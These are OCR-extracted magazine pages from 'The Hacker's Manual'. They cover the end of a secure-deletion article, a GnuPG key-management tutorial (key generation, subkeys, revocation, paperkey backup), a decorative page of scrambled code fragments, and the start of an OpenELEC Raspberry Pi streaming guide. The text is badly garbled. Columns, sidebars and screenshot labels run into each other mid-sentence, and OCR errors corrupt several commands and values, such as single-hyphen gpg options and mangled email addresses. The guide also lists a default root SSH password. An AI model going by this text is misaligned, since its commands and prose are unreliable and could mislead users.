times with random data, although you can increase on top of that, unsurprisingly, BleachBit can not only space and a
this using the -n flag. That’s surely enough, in fact you delete this unwanted data, but it can do so securely. whole lot more.
might think it’s more than enough, which raises the
question of why it overwrites the data multiple times. In
fact, it also takes us into the strange world of secure Q. Preview Clean Abort BleachBit
deletion utilities trying to outdo each other in how
v APT
many times the data is overwritten and how. Delete l.7MB/home/mike/Photos/P607992l.jpg
autodean
The commonly cited answer lies in the fact that, Delete l.7MB/home/mike/Photos/P6079922.jpg
autoremove Delete 1,8MB /home/mike/Photos/P6079924.jpg
when a bit is overwritten on a magnetic disk, it’s dean Delete 1.6MB/home/mike/Photos/P6089943.jpg

possible that the resulting magnetic density will Package lists


Disk space to be recovered: 6.8MB
v Bash
depend, to a degree, on what was written there Files to be deleted: 4
History
previously. Putting it simply, it’s suggested that
v Deep scan
overwriting a 0 with a 1 results in a slightly different .DS.Store
magnetisation from overwriting a 1 with a 1. So, if you Backup files
Delete confirmation x
measure the magnetism of all the bits in an overwritten Temporary files
Are you sure you want to permanently
Thumbs.db
file, and subtract the magnetism associated with the delete these files?
VIM swap files across system
current data, you’re left with the magnetism associated
VIM swap files under user profil
with the previous data, and can convert these weak Delete Cancel
v Evolution
signals to a string of Os and Is. And, so the argument Cache

goes, you can do this for any number of overwritings, v Firefox


Backup files
even though you end up with an increasingly small
Cache
signal that, at some point, will get lost in the noise.
Cookies
The snag with the argument is that you can’t do this Crash reports
using the normal hardware of a magnetic disk drive DOM Storage

because it’s designed to output just Os and Is, not the Form history
Passwords
analogue value of the magnetism. Instead, you’d need
to transfer the disk platter to some specialist and very
expensive hardware, which takes us from the realm of

The Hacker’s Manual | 71


Security

GnuPG: Key
Management
Your GnuPG key is your precious. We explain how to create a good one
and how to keep it safe from online thieves.

Index | Status pages | Overview of pools | Interact with the keyservers | HTTPS Verification | #Key development | Contact |

OpenPGP Public Key Server Commands


> The SKS Keyservers welcome to the keyserver interaction page for the pooi.sks-keyservers.net round-robin. Interactions
are one of a number will be performed over a TLS/SSL enabled connection.

of public keyservers
Extract a Key from the Server
with an interactive
web interface where Submit a Key to the Server
you can upload your
key or search for other
people’s.

Extracting a Key
Here is how to extract a key:

1. Select either the "Index" or "Verbose Index" check box. The "Verbose Index" option also
displays all signatures on displayed keys.
2. Type ID you want to search for in the "Search String" box.

3. Press the "Do the search!" key.

nuPG. the ''Gnu Privacy Guard”, is a privacy tool you keys, possibly obtaining a certificate from a key server, along

G can use to encrypt email or verify the authenticity of


software packages before installing them. It's an

public-key cryptography keys that have provable authenticity


with their own key-pairs in their GnuPG keyring. Depending
on context, 'key' can mean key-pair, private key. public key.
implementation of the OpenPGP standard that relies on subkey or certificate.
We'll explore these concepts as a hypothetical new user
through certification and trust. who can't wait to start encrypting everything. Let’s create
The GnuPG documentation explains early-on that good that user now: something like this:
key management is essential. So, in this tutorial, we will focus $ sudo useradd -m alice
on key management and explore best-practice with that aim $ sudo -i -u alice
in mind. We're using GnuPG version 2.1, nicknamed "Modern”.
Set your preferences
Some basics The first thing to do is configure GnuPG. It uses a directory
A GnuPG key has public and private components referred to (-Zgnupg by default) to store its configuration, runtime
individually as a public key and private key, and together as a information and the keyring. It can create this directory
key-pair. Private keys are used for signing and decryption, and automatically, but manually creating it enables us to specify
public keys are used for signature verification and encryption. some preferences before using GnuPG for the first time. Do
Public keys are contained in “certificates" along with so, using restricted access permissions to secure it:
Use gpg--full-gen- identifying information (a user id which may be a name, email $ mkdir -m 700 ~/.gnupg
key if you want to
address or, perhaps, a photograph) plus one or more Although optional (GnuPG assumes a default
interact! velychoose
dependent "subkeys" that enable separate keys for signing configuration), writing a configuration file allows us to set
key type, cipher
algorithm and key and encryption. The rationale behind subkeys lies in GnuPG's some parameters to customise personal preference:
size when creating development history and current security-related concerns. # ~/.gnupg/gpg.conf
a new key. An individual using GnuPG collects other people's public keyserver hkps://hkps.pool.sks-keyservers.net

72 | The Hacker's Manual


GnuPG

personal-cipher-preferences AES256 AES192 AES CAST5 such cases where a key cannot be revoked it is of some
personal-digest-preferences SHA512 SHA384 SHA256 comfort to know that it will expire at some point. Should the
SHA224 worst not happen, the expiry date can be changed, even if the
cert-digest-algo SHA512 key has already expired. Note that expired keys can still
The haveged
default-preference-list SHA512 SHA384 SHA256 SHA22 decrypt already encrypted messages.
(www.issihosts.
AES256 AES192 AES CASTS ZLLB BZIP2 ZIP The example parameter file includes the passphrase but com/haveged)
Uncompressed gpg will prompt for it interactively if it is omitted from the file. utility can help
This configuration example sets the default key server Other options may be given, such as "preferences" which providetheentropy
required for key
from where public key certificates can be obtained and states would override the default preference list in gpg.conf.
generation. Check
preferred cipher and digest (hashing) algorithms. The default­ The user id consists of the given name ("Name-Real"), yourdistro's
preference-list defines those preferences that will be included email ("Name-Email") and an optional comment ("Name- packagerepository.
when generating new keys so that third parties using them Comment”) that we didn't use. Popular opinion in the PGP
know what we would prefer them to use. Together, these community recommends against using comments because
preferences control the available algorithms that GnuPG may they are not part of your identity. Bear in mind that you can't
use and, as an example, we express our preference for more change a user id but you can revoke them and add new ones.
secure ones. The default algorithms, however, are suitable for
most use-cases should you prefer to stick with them. And the key is...
The easiest way to create a key is to enter gpg -gen-key Once key generation completes, gpgcan display a summary
and follow the prompts that request name, email address and of what was produced with its -list-keys (or -k) command:
a passphrase. This method uses default settings (including $ gpg -k alice
those from the configuration file) and would produce a non­ pub rsa4096 2016-10-03 [SC] [expires: 2017-10-03]
expiring 2048-bit "primary", or “master", RSA key for signing 109FB60CAD48C7820CF441A661EB6F7F34CE2E54
and certification, a user id formed from the given name and uid [ultimate] Alice <alice®example.org>
email, and a subkey (also 2048-bit RSA) for encryption. sub rsa4096 2016-10-03 [E] [expires: 2017-10-03]
Another approach is to use GnuPG's batch mode because This shows three things: a 4096-bit primary key, the user
it allows the required information to be provided in a id and a subkey. The [ultimate] annotation on the user id You can add
parameter file instead of prompting for it to be entered reflects trust in yourself (it's your key) and means your key is frequently used
interactively. The parameter file allows more detailed valid and you will trust any other keys you sign with it. formatting options
to gpg.conf. Just
configuration than the interactive tool and also serves as a The long string of hexadecimal characters is the primary
leaveofftheleading
record of the parameters used to generate the key. key's “fingerprint", a 160-bit SHA1 hash of the key material. double-hyphen.
$ cat «EOF > alice.keyparams The pub prefix to the primary key tells you that you're looking
Key-Type: RSA at the public key; the sub prefix conveys similar meaning for
Key-Length: 4096 the subkey. The two corresponding private keys aren't listed,
Key-Usage: sign but also exist in the newly created key ring (that is stored
Subkey-Type: RSA within the -/.gnupg directory). Use gpg -list-secret-keys (or
Subkey-Length: 4096 its short-form -K) to list them (see over): »
Subkey-Usage: encrypt
# Each basel6 line ends with a CRC-24 of that line.
Name-Real: Alice # The entire block of data ends with a CRC-24 of the entire block of data.
Name-Email: alice®example.org
1: 06 04 58 El AD EB 60 FB 8F 9F 19 B5 58 6F 50 D8 F0 AC Cl 4C CC 8F 851363
Passphrase: alicel234 2: 02 89 FE 07 03 02 3C 61 CE EC 6A 4B E6 A4 00 A4 AE Fl 4F 52 27 EE 2AA7E2
Expire-Date: ly 3: AB A6 1A 66 0D 20 BC 94 14 CB 8F 72 5E EC 7B E4 7B CA 8F 69 4C A8 73932D
4: 86 7B 7F 54 8D 25 21 92 2F C6 91 01 9D A5 C6 B6 28 FC 3F 35 42 85 961B5E
EOF 5: 48 CE OB 6F 99 F2 7F 95 CC 35 24 8C 40 4E 3D Cl IF 48 86 AD 95 AB 4822BC
$ gpg -verbose -gen-key -batch alice.keyparams 6: BA 68 9D 0A B8 FB F9 El 39 08 8B 77 Al C0 7C 0E 4C 9C 08 EF 9E 66 56FF4E
7: 6E 30 18 01 C7 E4 BO 00 68 4E 57 94 DO 9B A5 F4 14 35 BO 57 B0 08 384123
The key generation may take a little while because it 8: 91 EB 09 65 DA 4D 91 06 08 65 00 72 4B EC 19 E8 46 82 F8 2A E5 07 19E80F
requires "entropy" to provide sufficient random data: the 9: 48 8F F8 DA 13 57 13 FD DA 40 43 El AA 5C 04 C6 77 5E AA EC 6F F9 A0843E
10: CF 8A 03 63 56 7E B5 78 D5 23 31 AD FF 3C AF 7C 7E CE 4E 74 6F IB 075060
verbose option asks gpgfor progress feedback. 11: EF C7 CD 93 11 FA 25 02 FC 2C 64 51 CE E8 F5 EA 13 10 Bl 92 3A 57 0AD2DD
Our example generates larger 4096-bit keys (just to 12: 9F D7 2E IB 66 61 31 0D DA B8 43 A2 8E 43 D6 29 IB 56 95 A5 E7 F8 518912
13: 79 8D BE El 5B 54 80 5C 79 0A 75 EC 22 87 BA 15 DC 2C 98 C3 9B 8F C77B86
illustrate the capability. 2048-bit keys are secure for most 14: CE EC B8 57 BB A9 7D 46 89 E2 DA Bl E0 54 8A C4 16 67 5F FB 7C D7 FA35F9
purposes) that will expire one year after creation. An expired 15: 86 IE 07 F5 87 E8 4C 9E 9B 78 98 18 43 E8 D6 8F 89 8E AA 17 AD FB 6ADADE
16: 0B AC A0 2D 4A 13 43 A7 74 IE FA 33 39 12 BC E5 75 CB D8 90 Al 22 D5765C
key is invalid and cannot be used to sign or encrypt, and 17: 85 93 94 7A 16 D5 FB 7C E6 A9 A7 E6 99 82 4C 85 Fl C4 0B C6 3F 8B 01E32A
setting a date when this should occur is a precautionary 18: 73 96 AC 56 6F F8 26 70 40 A8 C5 CB A2 2E 0D 16 7F 72 86 42 72 B7 4373F5
19: 0A 86 CA CD 66 26 16 29 41 9D 54 32 41 63 CD 34 50 FD DF 40 40 9D A83422
measure that doesn't hurt but would be beneficial in the
event that the private key or its passphrase were ever lost. In > Paperkey's output can be used to recover your secret key.

keygen, pinentry, su, sudo and tty


GnuPG uses a gpg-agent daemon to manage require access to secret keys: you might see an its arguments are contained within the quotation
keys for gpgand this uses a pinentry helper tool error like this: marks. Alternatively, you can use gpg -pinentry-
whenever it requires interactive passphrase gpg: agent_genkey failed: Permission denied mode loopback to use a command-line
input. For this to work properly, your shell's tty If this happens to you. try this little trick that passphrase prompt instead of the pinentry
device must be owned by you (eg. for Alice, stat takes advantage of the script comma nd to do dialogue. Or, before the sudo or su.
-c %U $(tty) must be alice). This won't be the the key generation in a tty that you own: $ sudo chown alice $(tty)
case if you used sudo or su. and this may cause $ script -q -c “gpg ...” /dev/null You may also need to perform export GPG_
problems with tasks such as key generation that where the command you wish to use. plus all of TTY=$(tty).

The Hacker's Manual | 73


Security

$ gpg -K phones or tablets which are frequently taken to public places


sec rsa4096 2016-10-03 [SC] [expires: 2017-10-03] where they are easily stolen, left behind or otherwise lost.
109FB60CAD48C7820CF441A661EB6F7F34CE2E54
uid [ultimate] Alice <alice@example.org> Key perfection
ssb rsa4096 2016-10-03 [E] [expires: 2017-10-03] It would be better to not install your key on such devices in
Here, in otherwise similar output, the prefixes are sec the first place. However, that isn't practical if you need to sign
(secret) for the primary private key and ssb for the subkey. and encrypt on them. You can. however, use subkeys to help
The key’s fingerprint is the primary way to identify it but reduce and contain that risk because they have the fortunate
Check your they are usually referred to using a shorter key id of the last property that they can be separated from the primary key,
repositories or eight characters of the fingerprint. These short key ids are allowing it to be secured offline, and they can expire or be
search the web for prone to collision, so a longer key id of 64 bits (the last 16 revoked independently.
paperkey, ssssor
characters) can be used instead. They're still collision-prone, You can create an additional signing-only subkey so that
libgfshare.
but to a lesser extent; if in doubt, use the fingerprint! you have two: one for signing and another for encryption. You
Add -keyid-format short to gpg commands to request then detach those subkeys from the master key and only
they output the short key format, or -keyid-format long for install the subkeys on your everyday devices. Thus:
the longer one. If you use -fingerprint the fingerprint will be $ gpg -edit-key alice
displayed in a more readable form. Like this: gpg> addkey
> short “34CE2E54” The interactive interface requires selection of key type,
> long “61EB6F7F34CE2E54” usage (ie, signing, encryption), length (bits) and duration
> fingerprint “109F B60C AD48 C782 0CF4 41A6 61EB (validity period) which may be non-expiring or specified in
6F7F 34CE 2E54” days, weeks, months or years.
The fingerprint of the subkey is not displayed unless If you wish, you can give the subkeys a passphrase that is
-fingerprint is given twice. different from the primary key. You can either do this while in
Our new key is "self-certified" which means the primary edit mode or you can do it directly:
key signs the user id and subkey parts to assert that it owns $ gpg -passwd alice
them. You can view these signatures: Regardless of the method chosen, GnuPG iterates through
$ gpg --list-sigs alice all keys but you can decline those you don't want to alter:
pub rsa4096 2016-10-03 [SC] [expires: 2017-10-03] there is no way to specify a single key.
uid [ultimate] Alice <alice@example.org> Once you have your subkeys, you should export them
sig 3 61EB6F7F34CE2E54 2015-10-03 Alice <alice@ without the primary key:
example.org> $ gpg -export-secret-subkeys alice > subkeys.gpg
sub rsa4096 2016-10-03 [E] [expires: 2017-10-03] GnuPG will prompt for the passphrase before exporting
sig 61EB6F7F34CE2E54 2016-10-03 Alice <alice@example. the subkeys. You can then use a temporary keyring to review
org> what was exported:
Signatures are listed beneath the thing they are $ mkdir -m 700 .gnupg-temp
associated with. The display shows two signatures: one for $ gpg -homedir .gnupg-temp -import subkeys.gpg
the user id and the other for the subkey. $ gpg -homedir .gnupg-temp -K
The two “sig" lines shown above display the signing key id. sec# rsa4096 2016-10-04 [SC] [expires: 2017-10-04]
You can peer date and user id. The space after the "sig" may contain flags ssb rsa4096 2016-10-04 [E] [expires: 2017-10-04]
inside a keyring such as the “3” displayed on the primary key's signature ssb rsa2O48 2016-10-04 [S] [expires: 2017-04-02]
or export file with which indicates the effort made when verifying a key. GnuPG The -homedir tells GnuPG to use a specific directory
gpg --list-packets
to view its internal
assigns 3. the highest level, to the signatures it makes during (which can have any name but must pre-exist) instead of
OpenPGP data; it's the key generation. -/.gnupg. The hash mark following the sec tag indicates that
documented by In addition to the self-certification signatures added by the secret key is absent from this keyring; only the secret
RFC4880: GnuPG, third parties may also sign the uid entries on your key subkeys are present. The annotations show that the subkeys
(tools.ietf.org/
to assert their confidence that the key and user id belong can encrypt ("E") and sign (“S") data and that the primary
html/rfc4880).
together and to you. Such signatures strengthen your key and key can both sign data and certify ("C") other keys.
help you build your web of trust. You can remove the temporary keyring once you've
So that's the basic key set up and signed and ready for finished using it. Stop its daemon, then remove the directory:
use. You can use it as it is, but think about what it would mean $ gpg-connect-agent -homedir .gnupg-temp KILLAGENT I
if it was lost: a key in the wrong hands can be used to bye
masquerade as you, signing documents in your name and $ rm -r .gnupg-temp
reading documents encrypted for your eyes only. Making a temporary keyring is straightforward and easily
You increase the risk of this happening by installing your done whenever you need to work on your keys. A single pair
key on many devices, especially devices such as laptops, of subkeys is sufficient for everyday use on all your devices,

Cross certification
There is a vulnerability where a public subkey primary key to prove their authenticity. These signing subkeys generated with these
could be attached to another certificate whose “back" or "binding” signatures are embedded applications may lack the required binding
owner could then claim to have signed a within the self-certification signatures that signatures. Owners of such keys can resolve this
document. To prevent such a scenario occurring. GnuPG adds to the signing subkeys - you can't with the cross-certify command available in the
GnuPG now checks that signing keys are cross­ see them with -list-sigs. key editing mode of the latest gpg.
certified before verifying signatures. Cross Older versions of GnuPG or other OpenPGP You can read the official explanation at www.
certification requires that subkeys sign the applications may not have this feature and gnupg.org/faq/subkey-cross-certify.html.

74 | The Hacker's Manual


GnuPG

but you could generate them per-device if you wanted to


protect against loss of a single device. Repeat the steps to
create as many additional signing subkeys as you need, but
it's best to use the same encryption key on all devices
otherwise anyone wishing to send you encrypted material
would not know which encryption key to choose (they send to
you. not to your phone, tablet, or laptop). If you have made
device-specific subkeys then you can use a temporary
keyring to separate them into per-device key files. You import
your subkeys and delete the unwanted ones (which remain
safe within the imported file) and then export as before, but
into a new file. Recall that each device needs two secret keys:
the shared encryption subkey and the device-specific signing
key. Use edit mode to select and delete all other subkeys:
$ gpg -homedir .gnupg-temp -import subkeys.gpg
$ gpg -homedir .gnupg-temp -edit-key alice
gpg> key 3
gpg> delkey
gpg> save
$ gpg -homedir .gnupg-temp -export-secret-subkeys >
devicel-keys.gpg
Reload the subkeys and repeat the process for each
device you want to export keys for.
It's a good precaution to keep your primary key offline,
ideally by creating it on a secure computer that is protected > Tails Linux can be used to keep your keyring secure.
from the tainted internet (perhaps also your slightly-less
tainted local network). One way to do this is to use Tails Linux $ gpg -gen-revoke alice > alice.rev
and keep your keyring in its secure persistent volume. See Follow the prompts to select a reason for revocation and
https://tails.boum.org/doc/first_steps/persistencefor to supply an optional description. GnuPG prints a message
more information about this. warning that you should keep the revocation certificate safe; Tails Linux (tails.
The next best thing, and probably sufficient for the less they are as valuable as the private key they can invalidate. boum.org) makes
an ideal offline key
paranoid, is to remove the primary key from your keyring Should you ever need to use a revocation certificate, just
manager when you
when not in use and keep a secure backup somewhere import it into the key ring: store your keyring
suitable. You have to delete the entire key and then import $ gpg -import alice.rev in its persistent
only the subkeys. You should export the primary key before You can also revoke directly by using the revkey command volume.
removing it, and bear in mind that the exported key file will in edit mode. This can be used to revoke one or more keys
be your only copy of your primary secret key - until you and is how you would revoke a subkey without revoking the
make a backup. primary key. There are also revuid and revsig options that you
$ gpg -export-secret-keys alice > primary.gpg can use to revoke user identities and signatures.
$ gpg -delete-secret-key alice After revoking, like any other change to your keyring that
$ gpg -import subkeys.gpg you wish to publish, upload your keyring to a key server:
Rememoer that if you do remove your primary key. you $ gpg -send-key alice
will need to import it if you need to use it (and then remove it There are ways to further protect your private key and its
again afterwards): revocation certificate, such as keeping printed copies in a
$ gpg -import primary.gpg secure location, splitting them into parts and storing those in
multiple locations, or giving them to multiple trusted people.
Revoke and recover Paperkey (www.jabberwocky.com/software/paperkey)
Your master keyring is your precious. You need to protect it, is a tool that extracts the secret parts of your key (see a grab
but you also need to be prepared to destroy it should the bottom-right on the previous spread) and prints them with
worst happen. You need a secure backup and also a checksum data that makes it easier to type in by hand should
revocation certificate. This is a special certificate that you can the need ever arise:
use to tell the world that your key cannot be trusted and, $ paperkey -secret-key primary.gpg -output private.txt
therefore, should not be used. Once that happens, messages Recovery is equally simple, using your public key:
cannot be signed nor encrypted. Existing messages may be $ paperkey -pubring public.gpg -secrets private.txt -output
decrypted and verified, but GnuPG will warn the user that the secret.gpg
key is revoked. Your recovered key is still protected by your passphrase,
GnuPG prepares a revocation certificate automatically which you may want to give to some trusted third parties to
when creating a key: look in ~/.gnupg/openpgp-revocs.d for be used in the event of your unfortunate demise, ssss or
it, named with the key's fingerprint and a .rev suffix. As a gfsplit implement ''shamir's Secret Sharing” (yes, that's the
You can refer to a
safeguard against accidental use, it needs to be modified same Shamir of RSA fame) which lets you take something key using a user id,
before it can be used. It's a text file and contains instructions and split it in such a way that, say, three of five pieces are short or long key
explaining what you need to do (remove a leading colon from required to rebuild the original. You could split your key, id, or fingerprint.
Some tools may
the fist line of the certificate). revocation certificate, passphrase, etc, and give the split
require them
You can create a revocation certificate yourself and you pieces to those trusted individuals you'd like to be able to use
prefixed with "Ox"
may want to do this to specify a reason for revocation: them when you’re no longer able. ■

The Hacker's Manual | 75


fl fl fl fl fl, fl fl
fl fl Ik
H^fl ^bH ^Hr^Hk HkH jMF^^L
B^fl^vl fl fl fl fl
I fl fl I A ^1 I ^^fl fl fl
I I w IB w I
nprocessable_er ^flBflfl 3 bundle exec rake db:migrate $
4flPflB ^BB^BBBk

fl B
fl ■■■■ fl Lmm
ite_attributes(params[:task]) format.html fl flsl^B oB ■ fl^lse format.html {render action: “edit”} format.json {rei
:ec rails generate migration add_priority_to_tasks priority integer $ bundle exec rake db:migrate $ bundle exec rake db:migrate $ bundle exec rails server validate
at, ‘is in the past!’) if due_at < Time.zone.now #!/usr/bin/en python import pygame from random import randrange MAXJSTARS = 100 pygame.init() screen = py
ars = for i in range(MAX_STARS): star = [randrange(0,639), randiange(0,479), randrange(l, 16)] stars.append(star) while True: clock.tick(30) for event in pygame.
numstars = 100; use Time::HiRes qw(usleep); use Curses; $screen = new Curses; noecho; curs_set(0); for ($i = 0; $i < $numstars ; $i++) {$star_x[$i] = rand(80); $s
clear; for ($i = 0; $i < Snumstars ; $i++) {$star_x[$i] — $star_s[$i]; if ($star_x($i] < 0) {$star_x[$i] = 80;} $screen->addch($star_y[$i], $star_x[$i], “.”);} $screen->refre
rent, lest do gem “rspec-rails”, “~> 2.13.0” $ gem install bundle: $ gem install rails -version=3.2.12 $ rbenv rehash $ rails new todolist -skip-test-unit respond
nl {redirect_to ©task, notice: *...’} format.json {head :no_content} else format.html {render action: “edit”} format.json {render json: @task.errors, status: :unprc
ity_to_tasks priority integer $ bundle exec rake db:migrate $ bundle exec rake db:migrate $ bundle exec rails server validate :due_at_is_in_the_past def due_at_is_
jne.now #!/usr/bin/en python import pygame from random import randrange MAXJSTARS = 100 pygame.init() screen = pygame.display.set_mode((640, 480)) c
star = [randrange(0, 639), randrange(0, 479), randrange(l, 16)] stars.append(star) while True: clock.tick(30) for event in pygame.event.get(): if event.type = pyg
tes qw(usleep); use Curses; Sscreen = new Curses; noecho; curs_set(0); for ($i = 0; $i < Snumstars ; $i++) {$star_x[$i] = rand(80); $star_y($i] = rand(24); $star_s[$i]
s ; $i++) { $star_x[$i] ■= $star_s[$i]; if ($star_x($i] < 0) { $star_x($i] = 80;} $screen->addch($star_y[$i], $star_x($i], “.”);} $screen->refresh; usleep 50000; gem “then
Is”, 2.13.0” $ gem install bundler $ gem install rails -version=3.2.12 $ rbenv rehash $ rails new todolist -skip-test-unit respond_to do Iformatl if ©task.update_
’} format.json {head :no_content} else format.html {render action: “edit”} format.json {render json: ©taskerrors, status: :unprocessable_entity} $ bundle exec rails
exec rake db:migrate $ bundle exec rake db:migrate $ bundle exec rails server validate :due_at_is_in_thejpast def due_at_is_in_the_past errors.add(:due_at, ‘is in tl
rgame from random import randrange MAXJSTARS = 100 pygame.init() screen = pygame.display.set_mode((640, 480)) clock = pygame.time.Clock() stars = :
2(0, 479), randrange(l, 16)] stars.append(star) while True: clock.tick(30) for event in pygame.event.get(): if event.type = pygame.QUIT: exit(O) #!/usr/bin/perl $m
: new Curses; noecho: curs_set(0); for ($i = 0; $i < Snumstars ; $i++) { $star_x($i] = rand(80); $star_y[$i] = rand(24); $star_s[$i] = rand(4) + 1;} while (1) { Sscreen-
]; if ($star_x($i] < °) { $star_x[$i] = 80;} $screen->addch($star_y[$i], $star_x[$i], “.”);} $screen->refresh; usleep 50000; gem “therubyracer”, “~> 0.11.4” group :de-\
ndler $ gem install rails -version=3.2.12 $ rbenv rehash $ rails new todolist --skip-test-unit respond_to do Iformatl if @task.update_attributes(params[:task]) forma'
nt} else format.html {render action: “edit”} format.json {render json: @task.errors, status: :unprocessable_entity} $ bundle exec rails generate migration add_priorii
exec rake db:migrate S bundle exec rails server validate :due_at_is_in_the_past def due_at_is_in_the_past errors.add(:due_at, ‘is in the past!’) if due_at < Time.zon
ndrange MAXJSTARS = 100 pygame.init() screen = pygame.display.set_mode((640, 480)) clock = pygame.time.Clock() stars = for i in range(MAXJSTARS): star =
snd(star) while True: clock.tick(30) for event in pygame.event.get(): if event.type = pygame.QUIT: exit(O) #!/usr/bin/perl Snumstars = 100; use Time::HiRes qw(us
($i = 0; $i < $numstars ; $i++) { $star_x($i] = rand(80); $star_y[$i] = rand(24); $star_s[$i] = rand(4) + 1;} while (1) { $screen->clear; for ($i = 0; $i < Snumstars ; $i++)
reen->addch($star_y{Si], $star_x[$i], “.”);} $screen->refresh; usleep 50000; gem “therubyracer”, “~> 0.11.4” group development, itest do gem “rspec-rails”, “~> 2.13.0
Software
Discover the most powerful Linux
software and get using it
t.html {redirect_to @ta$k, notice: } format.json {head 78 OpenELEC
y_to_tasks priorityinteger $ bundle exec rake dbimigrate
Get to grips with the media system for
desktops and embedded systems.
e.now #!/usr/bin/en python import pygame from random
[randrangefO, 639), randrangefO, 479), randrangefl, 16)]
82 Virtual Box
sleep); use Curses; Sscreen = new Curses; noecho; curs_ Ensure you get the best out of your virtual
{$star_x[$i] -= $star_s[$i]; if f$star_x[$i] < 0) {$star_x[$i] systems with our essential guide.
” $ gem install bundler $ gem install rails -version=3.2.12
read ;no_content} else formathtml {render action: “edit” 86 NextCloud
migrate $ bundle exec rake db:migrate $ bundle exec rails The break away, all new cloud storage and
random import randrange MAXjSTARS = 100 pygame. document system is live for all.
efl, 16)] stars.append(star) while True: clock.tick(30) for
cursjset(O); for ($i = 0; $i < $numstars; $i++) {$star_x[$i] 90 NagiOS
x[$i] = 80;} $screen->addch($star_y[$i], $star_x[$i], “.”);} Industry-level system monitoring so you
can track all your Linux PCs.
on=3.2.12 $ rbenv rehash $ rails new todolist -skip-test-
r action: “edit”} format.json {render json: @taskerrors,
bundle exec rails server validate :due_at_is_in_the_past
PARS = 100 pygame.init() screen = pygame.display.set_
re: clock.tick(30) for event in pygame.event.get(): if event,
tars ; $i++) {$star_x[$i] = rand(80); $star_y[$i] = rand(24);
r_yf$i], $star_x[$i], } $screen->refresh; usleep 50000;
i new todolist -skip-test-unit respond_to do Iformatl if @i
ider json: @task.errors, status: :unprocessable_entity} $
:due_at_is_in_the_past def due_at_is_in_the_past errors.
game.display.set_mode((640, 480)) clock = pygame.time.
event.getf): if event.type = pygame.QUIT: exit(O) #!/usr/
tar_y[$i] = rand(24); $star_s[$i] = rand(4) +1;} while (1) {
sh; usleep 50000; gem “therubyracer”, “~> 0.11.4” groupi
_to do Iformatl if @task.update_attributes(params[:task])
)cessable_entity} $ bundle exec rails generate migration
in_the_past errors.add(:due_at, ‘is in the past!’) if due_at
lock = pygame.time.Clock() stars = for i in range(MAX_
■ame.QUIT: exit(O) #!/usr/bin/perl $numstars = 100; use
= rand(4) + 1;} while (1) { $screen->clear; for (Si = 0; $i <
rbyracer”, “~> 0.11.4” group development, lest do gem
attributes(params[:task]) format.html {redirect_to ©task,
generate migration add_priority_to_tasks priorityinteger
le past!’) if due_at < Time.zone.now #!/usr/bin/en python
for i in range(MAX_STARS): star = [randrangefO, 639),
imstars = 100; use Time::HiRes gw(usleep); use Curses;
>clear; for ($i — 0; $i < $numstars ; $i++) { $star_xf$i] -=
relopment, lest do gem “rspec-rails”, “~> 2.13.0” $ gem
t.html {redirect_to @task, notice: ‘...’} format.json {head
y_to_tasks priorityinteger $ bundle exec rake db:migrate
e.now #!/usr/bin/en python import pygame from random
; [randrangefO, 639), randrangefO, 479), randrangefl, 16)]
sleep); use Curses; $screen = new Curses; noecho; curs_ The Hacker's Manual | 77
{ $star_x[$i] -= $star_s[$i]; if f$star_x[$i] < 0) { $star_x[$i]
” $ gem install bundler $ gem install rails -version=3.2.12
Software

OpenELEC:
Media streamer
Crack out the hammer, we demonstrate how to build your own smart­
streaming stick using a Raspberry Pi for both personal and internet media.

> OpenELEC runs an


Take the time to initial configuration
check out OSMC wizard to get you
(http://osmc. connected - you’ll
tv). It's another need a USB hub if
Kodi-based distro you have a Pi Zero
optimised for
and want network
smaller devices
capabilities.
(including Pi), and
comes with its own
custom, minimalist
skin.There's
little difference
in performance,
and while OSMC
is simpler to use
out of the box,
OpenELECprovides
a more Kodi-like
experience.

hy fork out for an expensive set-top box when you

W can build your own for significantly less? Thanks


to the powerful open-source Kodi media centre

stored personal media on demand, plus watch a wide range


Choose your hardware
The cheapest way to build an OpenELEC streaming box from
software (https://kodi.tv), you can access both locally
scratch is to base it around the Pi Zero. There's one slight
complication caused by the fact it only has one USB port, so
of internet streaming services, including catch-up TV. you'll need a powered hub to support both keyboard and
The success of Kodi - formerly known as XBMC - has led Wi-Fi adaptor during the initial setup phase. Expect to pay
to the development of Kodi-flavoured distributions (distros). between £30 and £40 for all the kit you need. You'll need a Pi
If you're looking for a full-blown Ubuntu-based distro with Zero (obviously), case, power adaptor, Wi-Fi adaptor.
Kodi sitting on top then Kodibuntu (http://kodi.wiki/view/ microSD card, powered USB hub and accessories. If you’re
Kodibuntu) will appeal. willing to spend a little more, the Raspberry Pi Model B+
Kodibuntu is overkill for most people's needs, which is costs £19.20, the quad-core Pi 2 Model B costs £28 or the Pi
where OpenELEC (www.openelec.tv) comes in. This is an 3 Model B is £32 (http://uk-rsonline.com), not including
embedded OS built around Kodi, optimised for less powerful power and Wi-Fi adaptors, micro SD card and case. Both
setups and designed to be as simple to run and administer as come with Ethernet port for wired networking, plus four USB
possible. There's an underlying OS you can access via SSH, ports and full-size I-DM I port - choose the Pi 2 or 3 if you
but for the most part, you can restrict yourself exclusively to plan to run a media server.
the Kodi environment. You’ll need a keyboard for the initial configuration of
Four official builds are currently available: 'generic' OpenELEC, but once those steps are complete, you'll be able
covers 32-bit and 64-bit Intel, Nvidia and AMD graphic to control OpenELEC remotely via your web browser or using
setups; two Raspberry Pi flavours: one for the Pi 2 and 3, and a free mobile app. You'll also need somewhere to store your
the other for everything else, including the Pi Zero and the media. If you only have a small (sub-50GB collection), then
new Zero W; and one final build is for Freescale iMX6 ARM splash out for a 64GB microSD card and store it locally;
devices. There are further unofficial builds for jailbroken otherwise attach a USB hard drive or even store your media
Apple TV mark 1 boxes (head to http:Z/chewitt.openelec. on a NAS drive and connect over the network. Note the latter
tv/appletv) as well as AMLogic-based hardware (http:// option will slow things down considerably, and you may
bit.ly/amlogic-oe). experience buffering, particularly if connected via Wi-Fi.

78 | The Hacker's Manual


OpenELEC

SSH access
Switch on SSH and you have access to controlled by the connman daemon, eg -
the underlying Linux installation via the to change these, navigate to storage/,
Terminal (use ssh root@192.168.x.y cache/conman where you'll find a
substituting 192.168.x.y with your lengthy folder name beginning wifi_.
OpenELEC device's IP address. The Enter this folder using cd wifi* and then
password is 'openelec'). The main type nano settings to gain access.
purpose for doing this is to configure If you’d like to set a static IP address
OpenELEC without having to dive into from here, change the following lines:
System > OpenELEC. Start by typing Is IPv4.method=manual
-all and hitting Enter - you'll see the core Then add the following three lines
folders are hidden by default. beneath IPv6.privacy=disabled:
Basic commands are supported - IPv4.netmask_prefixlen=24
such as ifconfig for checking your IPv4.1ocal_address=192.168.x.y
network settings, and top to see current IPv4.gateway=192.168.X.2
